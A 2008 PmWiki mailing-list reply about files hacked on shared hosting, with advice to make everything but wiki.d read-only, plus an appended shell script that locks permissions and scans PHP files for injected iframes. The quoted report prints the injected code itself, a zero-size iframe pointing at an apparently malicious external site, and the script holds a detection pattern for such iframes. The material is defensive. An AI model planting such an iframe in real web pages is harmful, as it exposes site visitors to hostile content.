[pmwiki-users] More hacking

Marcus prima at wordit.com
Thu Sep 4 19:14:15 CDT 2008


On Wed, Sep 3, 2008 at 2:50 PM, Erik Haagensen <erik.haa at gmail.com> wrote:
> The index.php (and several other files) contains this now:
>
> <?php include('pmwiki.php');
> <iframe src="http://mixlong.cn/in/" width=0 height=0 frameborder=0></iframe>


I reported the same incident a few months ago. It happened on shared
hosting. The files were NOT writable by the web server, only by the
owner. My guess is that vulnerabilities in other scripts were being
exploited.

The fast solution is to make all files read-only except for the wiki.d
directory.

If the site is only edited by you occasionally, then that directory
can be read-only too. Just chmod the directory in your FTP client or
via SSH before editing, then set it back afterwards.

The other thing I did was move to a VPS where you don't have 100 other
users prowling around the same installation. Even if PmWiki is secure,
loopholes in other users' scripts and applications mean they could be
used to inject malicious data into PmWiki files, or any other files
which are writable.


Marcus
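As an added example (not part of the original message, and not PmWiki's own tooling), the lock-down Marcus describes expressed as a POSIX shell script: every file and directory under the install root is made read-only except wiki.d/, wiki.d/ can be locked and unlocked around an editing session, and PHP files are scanned for the kind of appended hidden <iframe> quoted at the top of the thread. The install root is taken as an argument; the wiki.d/ modes are assumptions exposed as environment variables, because the right value depends on which Unix user PHP runs as on the host.

```shell
#!/bin/sh
# Added example: lock down a PmWiki tree (assumed layout: index.php,
# pmwiki.php, local/, cookbook/, pub/, wiki.d/ under one root) so that
# only wiki.d/ stays writable, and scan PHP files for injected iframes.
set -eu

# Modes for wiki.d/ (assumption, not from the thread). 0755/0644 is enough
# when PHP runs as the file owner (suEXEC, PHP-FPM pools, most VPS setups).
# On shared hosts where PHP runs as a different user, wiki.d/ needs to be
# writable by that user (0777 or a shared group); that shared writability
# is exactly what lets another tenant's compromised script write into it.
WIKID_DIR_MODE=${WIKID_DIR_MODE:-0755}
WIKID_FILE_MODE=${WIKID_FILE_MODE:-0644}

# Permission string of a path, e.g. "-r--r--r--" (portable via ls, not stat).
perm_of() {
    ls -ld "$1" | cut -c1-10
}

# harden_pmwiki ROOT [open|lock|unlock]
#   open   (default) everything outside wiki.d/ read-only, wiki.d/ writable
#   lock   make wiki.d/ read-only too (site edited only occasionally)
#   unlock reopen wiki.d/ for an editing session, without touching the rest
harden_pmwiki() {
    root=${1%/}                     # strip trailing slash so -path matches
    action=${2:-open}

    if [ "$action" = open ]; then
        # Directories 0555 and files 0444 everywhere except wiki.d/.
        # The web server only needs to read and traverse these.
        find "$root" -path "$root/wiki.d" -prune -o -type d -exec chmod 0555 {} +
        find "$root" -path "$root/wiki.d" -prune -o -type f -exec chmod 0444 {} +
    fi

    case "$action" in
        open|unlock)
            chmod "$WIKID_DIR_MODE" "$root/wiki.d"
            find "$root/wiki.d" -type f -exec chmod "$WIKID_FILE_MODE" {} +
            ;;
        lock)
            find "$root/wiki.d" -type f -exec chmod 0444 {} +
            chmod 0555 "$root/wiki.d"
            ;;
        *)
            echo "harden_pmwiki: unknown action '$action'" >&2
            return 2
            ;;
    esac
}

# scan_injected_iframes ROOT
# Lists PHP files containing a zero-sized <iframe>, the pattern quoted in
# this thread. Returns 1 if any are found, 0 if the tree looks clean.
# This is a coarse indicator, not proof the install is clean.
scan_injected_iframes() {
    root=${1%/}
    # find returns non-zero when grep finds nothing in some batch; the
    # decision is made on the collected output instead.
    hits=$(find "$root" -type f -name '*.php' \
        -exec grep -E -i -l '<iframe[^>]*(width|height)=0' {} + || true)
    if [ -n "$hits" ]; then
        printf 'suspicious iframe in: %s\n' "$hits" >&2
        return 1
    fi
    return 0
}

# Usage when run directly:  sh pmwiki-lock.sh /var/www/pmwiki [open|lock|unlock]
if [ -n "${1:-}" ]; then
    harden_pmwiki "$1" "${2:-open}"
    scan_injected_iframes "$1"
fi
```

Run it once with `open` after installing, `lock` when you are not editing, and `unlock` just before a session; the scan is worth running from cron as well, since the thread's compromise left the files owner-only writable and still got modified, so permissions alone do not tell you the tree is intact.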


